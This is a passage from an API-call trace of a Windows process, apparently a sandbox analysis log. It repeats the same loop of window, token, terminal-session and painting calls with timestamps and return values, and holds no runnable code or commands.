fUnknown=0) [0071.639] SetForegroundWindow (hWnd=0x0) returned 0 [0071.639] BringWindowToTop (hWnd=0x0) returned 0 [0071.639] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x26c) returned 1 [0071.639] GetTokenInformation (in: TokenHandle=0x26c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.639] GetLastError () returned 0x7a [0071.639] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.639] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.640] WTSFreeMemory (pMemory=0x0) [0071.640] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.640] TextOutW (hdc=0x0, x=164, y=174, lpString="", c=0) returned 1 [0071.640] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.640] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.640] GetTickCount () returned 0x1f008 [0071.643] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.643] SetForegroundWindow (hWnd=0x0) returned 0 [0071.643] BringWindowToTop (hWnd=0x0) returned 0 [0071.643] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x270) returned 1 [0071.643] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.643] GetLastError () returned 0x7a [0071.643] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.643] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.644] WTSFreeMemory (pMemory=0x0) [0071.644] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.644] TextOutW (hdc=0x0, x=174, y=199, lpString="", c=0) returned 1 [0071.644] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.644] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.644] GetTickCount () returned 0x1f018 [0071.645] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.646] SetForegroundWindow (hWnd=0x0) returned 0 [0071.646] BringWindowToTop (hWnd=0x0) returned 0 [0071.646] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x274) returned 1 [0071.646] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.646] GetLastError () returned 0x7a [0071.646] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.646] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.646] WTSFreeMemory (pMemory=0x0) [0071.646] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.647] TextOutW (hdc=0x0, x=184, y=224, lpString="", c=0) returned 1 [0071.647] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.647] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.647] GetTickCount () returned 0x1f018 [0071.649] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.649] SetForegroundWindow (hWnd=0x0) returned 0 [0071.649] BringWindowToTop (hWnd=0x0) returned 0 [0071.649] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x278) returned 1 [0071.649] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.649] GetLastError () returned 0x7a [0071.650] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.650] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.650] WTSFreeMemory (pMemory=0x0) [0071.650] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.650] TextOutW (hdc=0x0, x=194, y=249, lpString="", c=0) returned 1 [0071.650] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.650] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.650] GetTickCount () returned 0x1f018 [0071.652] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.652] SetForegroundWindow (hWnd=0x0) returned 0 [0071.652] BringWindowToTop (hWnd=0x0) returned 0 [0071.652] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x27c) returned 1 [0071.652] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.652] GetLastError () returned 0x7a [0071.652] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.652] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.653] WTSFreeMemory (pMemory=0x0) [0071.653] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.653] TextOutW (hdc=0x0, x=204, y=274, lpString="", c=0) returned 1 [0071.653] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.653] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.653] GetTickCount () returned 0x1f018 [0071.655] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.655] SetForegroundWindow (hWnd=0x0) returned 0 [0071.655] BringWindowToTop (hWnd=0x0) returned 0 [0071.655] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x280) returned 1 [0071.655] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.655] GetLastError () returned 0x7a [0071.655] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.655] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.656] WTSFreeMemory (pMemory=0x0) [0071.656] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.656] TextOutW (hdc=0x0, x=214, y=299, lpString="", c=0) returned 1 [0071.656] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.656] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.656] GetTickCount () returned 0x1f018 [0071.658] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.658] SetForegroundWindow (hWnd=0x0) returned 0 [0071.658] BringWindowToTop (hWnd=0x0) returned 0 [0071.658] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x284) returned 1 [0071.658] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.658] GetLastError () returned 0x7a [0071.658] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.658] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.659] WTSFreeMemory (pMemory=0x0) [0071.659] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.661] TextOutW (hdc=0x0, x=224, y=324, lpString="", c=0) returned 1 [0071.661] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.661] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.662] GetTickCount () returned 0x1f027 [0071.666] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.666] SetForegroundWindow (hWnd=0x0) returned 0 [0071.666] BringWindowToTop (hWnd=0x0) returned 0 [0071.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x288) returned 1 [0071.666] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.667] GetLastError () returned 0x7a [0071.667] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.667] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.667] WTSFreeMemory (pMemory=0x0) [0071.667] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.670] TextOutW (hdc=0x0, x=234, y=349, lpString="", c=0) returned 1 [0071.670] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.670] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.670] GetTickCount () returned 0x1f027 [0071.674] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.674] SetForegroundWindow (hWnd=0x0) returned 0 [0071.674] BringWindowToTop (hWnd=0x0) returned 0 [0071.674] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x28c) returned 1 [0071.674] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.674] GetLastError () returned 0x7a [0071.674] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.674] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.677] WTSFreeMemory (pMemory=0x0) [0071.677] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.677] TextOutW (hdc=0x0, x=244, y=374, lpString="", c=0) returned 1 [0071.677] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.677] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.677] GetTickCount () returned 0x1f037 [0071.680] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.680] SetForegroundWindow (hWnd=0x0) returned 0 [0071.680] BringWindowToTop (hWnd=0x0) returned 0 [0071.680] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x290) returned 1 [0071.680] GetTokenInformation (in: TokenHandle=0x290, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.680] GetLastError () returned 0x7a [0071.680] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.680] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.681] WTSFreeMemory (pMemory=0x0) [0071.681] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.681] TextOutW (hdc=0x0, x=254, y=399, lpString="", c=0) returned 1 [0071.681] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.681] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.681] GetTickCount () returned 0x1f037 [0071.684] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.684] SetForegroundWindow (hWnd=0x0) returned 0 [0071.684] BringWindowToTop (hWnd=0x0) returned 0 [0071.684] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x294) returned 1 [0071.684] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.684] GetLastError () returned 0x7a [0071.684] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.684] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.685] WTSFreeMemory (pMemory=0x0) [0071.685] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.685] TextOutW (hdc=0x0, x=264, y=424, lpString="", c=0) returned 1 [0071.685] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.685] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.685] GetTickCount () returned 0x1f037 [0071.688] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.688] SetForegroundWindow (hWnd=0x0) returned 0 [0071.688] BringWindowToTop (hWnd=0x0) returned 0 [0071.689] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x298) returned 1 [0071.689] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.689] GetLastError () returned 0x7a [0071.689] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.689] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.689] WTSFreeMemory (pMemory=0x0) [0071.689] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.689] TextOutW (hdc=0x0, x=274, y=449, lpString="", c=0) returned 1 [0071.690] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.690] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.690] GetTickCount () returned 0x1f037 [0071.695] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.695] SetForegroundWindow (hWnd=0x0) returned 0 [0071.695] BringWindowToTop (hWnd=0x0) returned 0 [0071.695] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x29c) returned 1 [0071.695] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.696] GetLastError () returned 0x7a [0071.696] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.696] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.696] WTSFreeMemory (pMemory=0x0) [0071.696] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.696] TextOutW (hdc=0x0, x=284, y=474, lpString="", c=0) returned 1 [0071.696] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.696] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.696] GetTickCount () returned 0x1f046 [0071.698] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.698] SetForegroundWindow (hWnd=0x0) returned 0 [0071.698] BringWindowToTop (hWnd=0x0) returned 0 [0071.698] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2a0) returned 1 [0071.698] GetTokenInformation (in: TokenHandle=0x2a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.698] GetLastError () returned 0x7a [0071.698] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.698] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.699] WTSFreeMemory (pMemory=0x0) [0071.699] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.699] TextOutW (hdc=0x0, x=294, y=499, lpString="", c=0) returned 1 [0071.699] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.699] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.699] GetTickCount () returned 0x1f046 [0071.701] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.701] SetForegroundWindow (hWnd=0x0) returned 0 [0071.701] BringWindowToTop (hWnd=0x0) returned 0 [0071.701] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2a4) returned 1 [0071.702] GetTokenInformation (in: TokenHandle=0x2a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.702] GetLastError () returned 0x7a [0071.702] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.702] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.702] WTSFreeMemory (pMemory=0x0) [0071.702] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.702] TextOutW (hdc=0x0, x=304, y=524, lpString="", c=0) returned 1 [0071.702] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.702] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.702] GetTickCount () returned 0x1f046 [0071.703] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.703] SetForegroundWindow (hWnd=0x0) returned 0 [0071.704] BringWindowToTop (hWnd=0x0) returned 0 [0071.704] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2a8) returned 1 [0071.704] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.704] GetLastError () returned 0x7a [0071.704] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.704] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.704] WTSFreeMemory (pMemory=0x0) [0071.704] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.704] TextOutW (hdc=0x0, x=314, y=549, lpString="", c=0) returned 1 [0071.704] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.704] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.704] GetTickCount () returned 0x1f046 [0071.710] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.710] SetForegroundWindow (hWnd=0x0) returned 0 [0071.710] BringWindowToTop (hWnd=0x0) returned 0 [0071.710] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2ac) returned 1 [0071.710] GetTokenInformation (in: TokenHandle=0x2ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.710] GetLastError () returned 0x7a [0071.710] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.710] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.711] WTSFreeMemory (pMemory=0x0) [0071.711] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.711] TextOutW (hdc=0x0, x=324, y=574, lpString="", c=0) returned 1 [0071.711] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.711] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.711] GetTickCount () returned 0x1f056 [0071.712] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.712] SetForegroundWindow (hWnd=0x0) returned 0 [0071.712] BringWindowToTop (hWnd=0x0) returned 0 [0071.712] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2b0) returned 1 [0071.712] GetTokenInformation (in: TokenHandle=0x2b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.712] GetLastError () returned 0x7a [0071.712] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.712] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.712] WTSFreeMemory (pMemory=0x0) [0071.712] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.713] TextOutW (hdc=0x0, x=334, y=599, lpString="", c=0) returned 1 [0071.713] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.713] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.713] GetTickCount () returned 0x1f056 [0071.714] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.714] SetForegroundWindow (hWnd=0x0) returned 0 [0071.715] BringWindowToTop (hWnd=0x0) returned 0 [0071.715] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2b4) returned 1 [0071.715] GetTokenInformation (in: TokenHandle=0x2b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.715] GetLastError () returned 0x7a [0071.715] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.715] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.715] WTSFreeMemory (pMemory=0x0) [0071.715] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.715] TextOutW (hdc=0x0, x=344, y=624, lpString="", c=0) returned 1 [0071.715] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.716] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.716] GetTickCount () returned 0x1f056 [0071.716] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.716] SetForegroundWindow (hWnd=0x0) returned 0 [0071.717] BringWindowToTop (hWnd=0x0) returned 0 [0071.717] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2b8) returned 1 [0071.717] GetTokenInformation (in: TokenHandle=0x2b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.717] GetLastError () returned 0x7a [0071.717] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.717] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.717] WTSFreeMemory (pMemory=0x0) [0071.717] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.720] TextOutW (hdc=0x0, x=354, y=649, lpString="", c=0) returned 1 [0071.720] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.720] 